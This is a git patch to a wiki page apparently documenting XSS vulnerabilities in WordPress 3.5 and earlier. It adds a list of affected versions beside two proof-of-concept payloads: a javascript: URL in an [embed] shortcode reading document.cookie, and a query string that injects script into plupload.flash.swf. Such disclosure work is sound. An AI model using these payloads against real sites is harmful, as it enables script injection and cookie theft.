From e3bc479b19b460969bcbc2a6c3cad16389f3c1d0 Mon Sep 17 00:00:00 2001 From: ethicalhack3r Date: Sun, 27 Jan 2013 07:10:11 -0800 Subject: [PATCH] Updated WordPress 3.5 Issues (markdown) --- WordPress-3.5-Issues.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/WordPress-3.5-Issues.md b/WordPress-3.5-Issues.md index 7b8c087..932c6b2 100644 --- a/WordPress-3.5-Issues.md +++ b/WordPress-3.5-Issues.md @@ -26,7 +26,9 @@ Proof of Concept: ```[embed]javascript:alert(document.cookie)[/embed]``` ## Issue 3 -This issue was successfully investigated by [@erwan_lr](https://twitter.com/@erwan_lr), a WPScan Team member. "[Plupload] Allows you to upload files using HTML5 Gears, Silverlight, Flash, BrowserPlus or normal forms, providing some unique features such as upload progress, image resizing and chunked uploads." [2] +This issue was successfully investigated by [@erwan_lr](https://twitter.com/@erwan_lr), a WPScan Team member. "[Plupload] Allows you to upload files using HTML5 Gears, Silverlight, Flash, BrowserPlus or normal forms, providing some unique features such as upload progress, image resizing and chunked uploads." [2] + +The vulnerable file is included in WordPress versions 3.5, 3.4.2, 3.4.1, 3.4, 3.3.3 and 3.3.2. Proof of Concept: ```wp-includes/js/plupload/plupload.flash.swf?id=\"));}catch(e){alert(1);}//```